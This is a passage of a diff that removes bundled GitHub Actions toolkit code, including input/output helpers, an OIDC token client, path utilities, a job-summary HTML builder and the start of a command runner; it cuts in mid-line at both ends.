mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; -const command_1 = __nccwpck_require__(7351); -const file_command_1 = __nccwpck_require__(717); -const utils_1 = __nccwpck_require__(5278); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const oidc_utils_1 = __nccwpck_require__(8041); -/** - * The code to exit an action - */ -var ExitCode; -(function (ExitCode) { - /** - * A code indicating that the action was successful - */ - ExitCode[ExitCode["Success"] = 0] = "Success"; - /** - * A code indicating that the action was a failure - */ - ExitCode[ExitCode["Failure"] = 1] = "Failure"; -})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); -//----------------------------------------------------------------------- -// Variables -//----------------------------------------------------------------------- -/** - * Sets env variable for this action and future actions in the job - * @param name the name of the variable to set - * @param val the value of the variable. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function exportVariable(name, val) { - const convertedVal = utils_1.toCommandValue(val); - process.env[name] = convertedVal; - const filePath = process.env['GITHUB_ENV'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); - } - command_1.issueCommand('set-env', { name }, convertedVal); -} -exports.exportVariable = exportVariable; -/** - * Registers a secret which will get masked from logs - * @param secret value of the secret - */ -function setSecret(secret) { - command_1.issueCommand('add-mask', {}, secret); -} -exports.setSecret = setSecret; -/** - * Prepends inputPath to the PATH (for this action and future actions) - * @param inputPath - */ -function addPath(inputPath) { - const filePath = process.env['GITHUB_PATH'] || ''; - if (filePath) { - file_command_1.issueFileCommand('PATH', inputPath); - } - else { - command_1.issueCommand('add-path', {}, inputPath); - } - process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; -} -exports.addPath = addPath; -/** - * Gets the value of an input. - * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. - * Returns an empty string if the value is not defined. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string - */ -function getInput(name, options) { - const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; - if (options && options.required && !val) { - throw new Error(`Input required and not supplied: ${name}`); - } - if (options && options.trimWhitespace === false) { - return val; - } - return val.trim(); -} -exports.getInput = getInput; -/** - * Gets the values of an multiline input. Each value is also trimmed. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string[] - * - */ -function getMultilineInput(name, options) { - const inputs = getInput(name, options) - .split('\n') - .filter(x => x !== ''); - if (options && options.trimWhitespace === false) { - return inputs; - } - return inputs.map(input => input.trim()); -} -exports.getMultilineInput = getMultilineInput; -/** - * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. - * Support boolean input list: `true | True | TRUE | false | False | FALSE` . - * The return value is also in boolean type. - * ref: https://yaml.org/spec/1.2/spec.html#id2804923 - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns boolean - */ -function getBooleanInput(name, options) { - const trueValue = ['true', 'True', 'TRUE']; - const falseValue = ['false', 'False', 'FALSE']; - const val = getInput(name, options); - if (trueValue.includes(val)) - return true; - if (falseValue.includes(val)) - return false; - throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + - `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); -} -exports.getBooleanInput = getBooleanInput; -/** - * Sets the value of an output. - * - * @param name name of the output to set - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function setOutput(name, value) { - const filePath = process.env['GITHUB_OUTPUT'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); - } - process.stdout.write(os.EOL); - command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); -} -exports.setOutput = setOutput; -/** - * Enables or disables the echoing of commands into stdout for the rest of the step. - * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. - * - */ -function setCommandEcho(enabled) { - command_1.issue('echo', enabled ? 'on' : 'off'); -} -exports.setCommandEcho = setCommandEcho; -//----------------------------------------------------------------------- -// Results -//----------------------------------------------------------------------- -/** - * Sets the action status to failed. - * When the action exits it will be with an exit code of 1 - * @param message add error issue message - */ -function setFailed(message) { - process.exitCode = ExitCode.Failure; - error(message); -} -exports.setFailed = setFailed; -//----------------------------------------------------------------------- -// Logging Commands -//----------------------------------------------------------------------- -/** - * Gets whether Actions Step Debug is on or not - */ -function isDebug() { - return process.env['RUNNER_DEBUG'] === '1'; -} -exports.isDebug = isDebug; -/** - * Writes debug message to user log - * @param message debug message - */ -function debug(message) { - command_1.issueCommand('debug', {}, message); -} -exports.debug = debug; -/** - * Adds an error issue - * @param message error issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function error(message, properties = {}) { - command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.error = error; -/** - * Adds a warning issue - * @param message warning issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function warning(message, properties = {}) { - command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.warning = warning; -/** - * Adds a notice issue - * @param message notice issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function notice(message, properties = {}) { - command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.notice = notice; -/** - * Writes info to log with console.log. - * @param message info message - */ -function info(message) { - process.stdout.write(message + os.EOL); -} -exports.info = info; -/** - * Begin an output group. - * - * Output until the next `groupEnd` will be foldable in this group - * - * @param name The name of the output group - */ -function startGroup(name) { - command_1.issue('group', name); -} -exports.startGroup = startGroup; -/** - * End an output group. - */ -function endGroup() { - command_1.issue('endgroup'); -} -exports.endGroup = endGroup; -/** - * Wrap an asynchronous function call in a group. - * - * Returns the same type as the function itself. - * - * @param name The name of the group - * @param fn The function to wrap in the group - */ -function group(name, fn) { - return __awaiter(this, void 0, void 0, function* () { - startGroup(name); - let result; - try { - result = yield fn(); - } - finally { - endGroup(); - } - return result; - }); -} -exports.group = group; -//----------------------------------------------------------------------- -// Wrapper action state -//----------------------------------------------------------------------- -/** - * Saves state for current action, the state can only be retrieved by this action's post job execution. - * - * @param name name of the state to store - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function saveState(name, value) { - const filePath = process.env['GITHUB_STATE'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); - } - command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); -} -exports.saveState = saveState; -/** - * Gets the value of an state set by this action's main execution. - * - * @param name name of the state to get - * @returns string - */ -function getState(name) { - return process.env[`STATE_${name}`] || ''; -} -exports.getState = getState; -function getIDToken(aud) { - return __awaiter(this, void 0, void 0, function* () { - return yield oidc_utils_1.OidcClient.getIDToken(aud); - }); -} -exports.getIDToken = getIDToken; -/** - * Summary exports - */ -var summary_1 = __nccwpck_require__(1327); -Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); -/** - * @deprecated use core.summary - */ -var summary_2 = __nccwpck_require__(1327); -Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); -/** - * Path exports - */ -var path_utils_1 = __nccwpck_require__(2981); -Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); -Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); -Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); -//# sourceMappingURL=core.js.map - -/***/ }), - -/***/ 717: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -// For internal use, subject to change. -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -const fs = __importStar(__nccwpck_require__(7147)); -const os = __importStar(__nccwpck_require__(2037)); -const uuid_1 = __nccwpck_require__(5840); -const utils_1 = __nccwpck_require__(5278); -function issueFileCommand(command, message) { - const filePath = process.env[`GITHUB_${command}`]; - if (!filePath) { - throw new Error(`Unable to find environment variable for file command ${command}`); - } - if (!fs.existsSync(filePath)) { - throw new Error(`Missing file at path: ${filePath}`); - } - fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { - encoding: 'utf8' - }); -} -exports.issueFileCommand = issueFileCommand; -function prepareKeyValueMessage(key, value) { - const delimiter = `ghadelimiter_${uuid_1.v4()}`; - const convertedValue = utils_1.toCommandValue(value); - // These should realistically never happen, but just in case someone finds a - // way to exploit uuid generation let's not allow keys or values that contain - // the delimiter. - if (key.includes(delimiter)) { - throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); - } - if (convertedValue.includes(delimiter)) { - throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); - } - return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; -} -exports.prepareKeyValueMessage = prepareKeyValueMessage; -//# sourceMappingURL=file-command.js.map - -/***/ }), - -/***/ 8041: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.OidcClient = void 0; -const http_client_1 = __nccwpck_require__(6255); -const auth_1 = __nccwpck_require__(5526); -const core_1 = __nccwpck_require__(2186); -class OidcClient { - static createHttpClient(allowRetry = true, maxRetry = 10) { - const requestOptions = { - allowRetries: allowRetry, - maxRetries: maxRetry - }; - return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); - } - static getRequestToken() { - const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; - if (!token) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); - } - return token; - } - static getIDTokenUrl() { - const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; - if (!runtimeUrl) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); - } - return runtimeUrl; - } - static getCall(id_token_url) { - var _a; - return __awaiter(this, void 0, void 0, function* () { - const httpclient = OidcClient.createHttpClient(); - const res = yield httpclient - .getJson(id_token_url) - .catch(error => { - throw new Error(`Failed to get ID Token. \n - Error Code : ${error.statusCode}\n - Error Message: ${error.message}`); - }); - const id_token = (_a = res.result) === null || _a === void 0 ? void 0 : _a.value; - if (!id_token) { - throw new Error('Response json body do not have ID Token field'); - } - return id_token; - }); - } - static getIDToken(audience) { - return __awaiter(this, void 0, void 0, function* () { - try { - // New ID Token is requested from action service - let id_token_url = OidcClient.getIDTokenUrl(); - if (audience) { - const encodedAudience = encodeURIComponent(audience); - id_token_url = `${id_token_url}&audience=${encodedAudience}`; - } - core_1.debug(`ID token url is ${id_token_url}`); - const id_token = yield OidcClient.getCall(id_token_url); - core_1.setSecret(id_token); - return id_token; - } - catch (error) { - throw new Error(`Error message: ${error.message}`); - } - }); - } -} -exports.OidcClient = OidcClient; -//# sourceMappingURL=oidc-utils.js.map - -/***/ }), - -/***/ 2981: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; -const path = __importStar(__nccwpck_require__(1017)); -/** - * toPosixPath converts the given path to the posix form. On Windows, \\ will be - * replaced with /. - * - * @param pth. Path to transform. - * @return string Posix path. - */ -function toPosixPath(pth) { - return pth.replace(/[\\]/g, '/'); -} -exports.toPosixPath = toPosixPath; -/** - * toWin32Path converts the given path to the win32 form. On Linux, / will be - * replaced with \\. - * - * @param pth. Path to transform. - * @return string Win32 path. - */ -function toWin32Path(pth) { - return pth.replace(/[/]/g, '\\'); -} -exports.toWin32Path = toWin32Path; -/** - * toPlatformPath converts the given path to a platform-specific path. It does - * this by replacing instances of / and \ with the platform-specific path - * separator. - * - * @param pth The path to platformize. - * @return string The platform-specific path. - */ -function toPlatformPath(pth) { - return pth.replace(/[/\\]/g, path.sep); -} -exports.toPlatformPath = toPlatformPath; -//# sourceMappingURL=path-utils.js.map - -/***/ }), - -/***/ 1327: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; -const os_1 = __nccwpck_require__(2037); -const fs_1 = __nccwpck_require__(7147); -const { access, appendFile, writeFile } = fs_1.promises; -exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; -exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; -class Summary { - constructor() { - this._buffer = ''; - } - /** - * Finds the summary file path from the environment, rejects if env var is not found or file does not exist - * Also checks r/w permissions. - * - * @returns step summary file path - */ - filePath() { - return __awaiter(this, void 0, void 0, function* () { - if (this._filePath) { - return this._filePath; - } - const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; - if (!pathFromEnv) { - throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); - } - try { - yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); - } - catch (_a) { - throw new Error(`Unable to access summary file: '${pathFromEnv}'. Check if the file has correct read/write permissions.`); - } - this._filePath = pathFromEnv; - return this._filePath; - }); - } - /** - * Wraps content in an HTML tag, adding any HTML attributes - * - * @param {string} tag HTML tag to wrap - * @param {string | null} content content within the tag - * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add - * - * @returns {string} content wrapped in HTML element - */ - wrap(tag, content, attrs = {}) { - const htmlAttrs = Object.entries(attrs) - .map(([key, value]) => ` ${key}="${value}"`) - .join(''); - if (!content) { - return `<${tag}${htmlAttrs}>`; - } - return `<${tag}${htmlAttrs}>${content}`; - } - /** - * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. - * - * @param {SummaryWriteOptions} [options] (optional) options for write operation - * - * @returns {Promise

} summary instance - */ - write(options) { - return __awaiter(this, void 0, void 0, function* () { - const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); - const filePath = yield this.filePath(); - const writeFunc = overwrite ? writeFile : appendFile; - yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); - return this.emptyBuffer(); - }); - } - /** - * Clears the summary buffer and wipes the summary file - * - * @returns {Summary} summary instance - */ - clear() { - return __awaiter(this, void 0, void 0, function* () { - return this.emptyBuffer().write({ overwrite: true }); - }); - } - /** - * Returns the current summary buffer as a string - * - * @returns {string} string of summary buffer - */ - stringify() { - return this._buffer; - } - /** - * If the summary buffer is empty - * - * @returns {boolen} true if the buffer is empty - */ - isEmptyBuffer() { - return this._buffer.length === 0; - } - /** - * Resets the summary buffer without writing to summary file - * - * @returns {Summary} summary instance - */ - emptyBuffer() { - this._buffer = ''; - return this; - } - /** - * Adds raw text to the summary buffer - * - * @param {string} text content to add - * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) - * - * @returns {Summary} summary instance - */ - addRaw(text, addEOL = false) { - this._buffer += text; - return addEOL ? this.addEOL() : this; - } - /** - * Adds the operating system-specific end-of-line marker to the buffer - * - * @returns {Summary} summary instance - */ - addEOL() { - return this.addRaw(os_1.EOL); - } - /** - * Adds an HTML codeblock to the summary buffer - * - * @param {string} code content to render within fenced code block - * @param {string} lang (optional) language to syntax highlight code - * - * @returns {Summary} summary instance - */ - addCodeBlock(code, lang) { - const attrs = Object.assign({}, (lang && { lang })); - const element = this.wrap('pre', this.wrap('code', code), attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML list to the summary buffer - * - * @param {string[]} items list of items to render - * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) - * - * @returns {Summary} summary instance - */ - addList(items, ordered = false) { - const tag = ordered ? 'ol' : 'ul'; - const listItems = items.map(item => this.wrap('li', item)).join(''); - const element = this.wrap(tag, listItems); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML table to the summary buffer - * - * @param {SummaryTableCell[]} rows table rows - * - * @returns {Summary} summary instance - */ - addTable(rows) { - const tableBody = rows - .map(row => { - const cells = row - .map(cell => { - if (typeof cell === 'string') { - return this.wrap('td', cell); - } - const { header, data, colspan, rowspan } = cell; - const tag = header ? 'th' : 'td'; - const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); - return this.wrap(tag, data, attrs); - }) - .join(''); - return this.wrap('tr', cells); - }) - .join(''); - const element = this.wrap('table', tableBody); - return this.addRaw(element).addEOL(); - } - /** - * Adds a collapsable HTML details element to the summary buffer - * - * @param {string} label text for the closed state - * @param {string} content collapsable content - * - * @returns {Summary} summary instance - */ - addDetails(label, content) { - const element = this.wrap('details', this.wrap('summary', label) + content); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML image tag to the summary buffer - * - * @param {string} src path to the image you to embed - * @param {string} alt text description of the image - * @param {SummaryImageOptions} options (optional) addition image attributes - * - * @returns {Summary} summary instance - */ - addImage(src, alt, options) { - const { width, height } = options || {}; - const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); - const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML section heading element - * - * @param {string} text heading text - * @param {number | string} [level=1] (optional) the heading level, default: 1 - * - * @returns {Summary} summary instance - */ - addHeading(text, level) { - const tag = `h${level}`; - const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) - ? tag - : 'h1'; - const element = this.wrap(allowedTag, text); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML thematic break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addSeparator() { - const element = this.wrap('hr', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML line break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addBreak() { - const element = this.wrap('br', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML blockquote to the summary buffer - * - * @param {string} text quote text - * @param {string} cite (optional) citation url - * - * @returns {Summary} summary instance - */ - addQuote(text, cite) { - const attrs = Object.assign({}, (cite && { cite })); - const element = this.wrap('blockquote', text, attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML anchor tag to the summary buffer - * - * @param {string} text link text/content - * @param {string} href hyperlink - * - * @returns {Summary} summary instance - */ - addLink(text, href) { - const element = this.wrap('a', text, { href }); - return this.addRaw(element).addEOL(); - } -} -const _summary = new Summary(); -/** - * @deprecated use `core.summary` - */ -exports.markdownSummary = _summary; -exports.summary = _summary; -//# sourceMappingURL=summary.js.map - -/***/ }), - -/***/ 5278: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toCommandProperties = exports.toCommandValue = void 0; -/** - * Sanitizes an input into a string so it can be passed into issueCommand safely - * @param input input to sanitize into a string - */ -function toCommandValue(input) { - if (input === null || input === undefined) { - return ''; - } - else if (typeof input === 'string' || input instanceof String) { - return input; - } - return JSON.stringify(input); -} -exports.toCommandValue = toCommandValue; -/** - * - * @param annotationProperties - * @returns The command properties to send with the actual annotation command - * See IssueCommandProperties: https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 - */ -function toCommandProperties(annotationProperties) { - if (!Object.keys(annotationProperties).length) { - return {}; - } - return { - title: annotationProperties.title, - file: annotationProperties.file, - line: annotationProperties.startLine, - endLine: annotationProperties.endLine, - col: annotationProperties.startColumn, - endColumn: annotationProperties.endColumn - }; -} -exports.toCommandProperties = toCommandProperties; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 1514: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getExecOutput = exports.exec = void 0; -const string_decoder_1 = __nccwpck_require__(1576); -const tr = __importStar(__nccwpck_require__(8159)); -/** - * Exec a command. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code - */ -function exec(commandLine, args, options) { - return __awaiter(this, void 0, void 0, function* () { - const commandArgs = tr.argStringToArray(commandLine); - if (commandArgs.length === 0) { - throw new Error(`Parameter 'commandLine' cannot be null or empty.`); - } - // Path to tool to execute should be first arg - const toolPath = commandArgs[0]; - args = commandArgs.slice(1).concat(args || []); - const runner = new tr.ToolRunner(toolPath, args, options); - return runner.exec(); - }); -} -exports.exec = exec; -/** - * Exec a command and get the output. - * Output will be streamed to the live console. - * Returns promise with the exit code and collected stdout and stderr - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code, stdout, and stderr - */ -function getExecOutput(commandLine, args, options) { - var _a, _b; - return __awaiter(this, void 0, void 0, function* () { - let stdout = ''; - let stderr = ''; - //Using string decoder covers the case where a mult-byte character is split - const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); - const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); - const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; - const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; - const stdErrListener = (data) => { - stderr += stderrDecoder.write(data); - if (originalStdErrListener) { - originalStdErrListener(data); - } - }; - const stdOutListener = (data) => { - stdout += stdoutDecoder.write(data); - if (originalStdoutListener) { - originalStdoutListener(data); - } - }; - const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); - const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); - //flush any remaining characters - stdout += stdoutDecoder.end(); - stderr += stderrDecoder.end(); - return { - exitCode, - stdout, - stderr - }; - }); -} -exports.getExecOutput = getExecOutput; -//# sourceMappingURL=exec.js.map - -/***/ }), - -/***/ 8159: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.argStringToArray = exports.ToolRunner = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const events = __importStar(__nccwpck_require__(2361)); -const child = __importStar(__nccwpck_require__(2081)); -const path = __importStar(__nccwpck_require__(1017)); -const io = __importStar(__nccwpck_require__(7436)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -const timers_1 = __nccwpck_require__(9512); -/* eslint-disable @typescript-eslint/unbound-method */ -const IS_WINDOWS = process.platform === 'win32'; -/* - * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. - */ -class ToolRunner extends events.EventEmitter { - constructor(toolPath, args, options) { - super(); - if (!toolPath) { - throw new Error("Parameter 'toolPath' cannot be null or empty."); - } - this.toolPath = toolPath; - this.args = args || []; - this.options = options || {}; - } - _debug(message) { - if (this.options.listeners && this.options.listeners.debug) { - this.options.listeners.debug(message); - } - } - _getCommandString(options, noPrefix) { - const toolPath = this._getSpawnFileName(); - const args = this._getSpawnArgs(options); - let cmd = noPrefix ? '' : '[command]'; // omit prefix when piped to a second tool - if (IS_WINDOWS) { - // Windows + cmd file - if (this._isCmdFile()) { - cmd += toolPath; - for (const a of args) { - cmd += ` 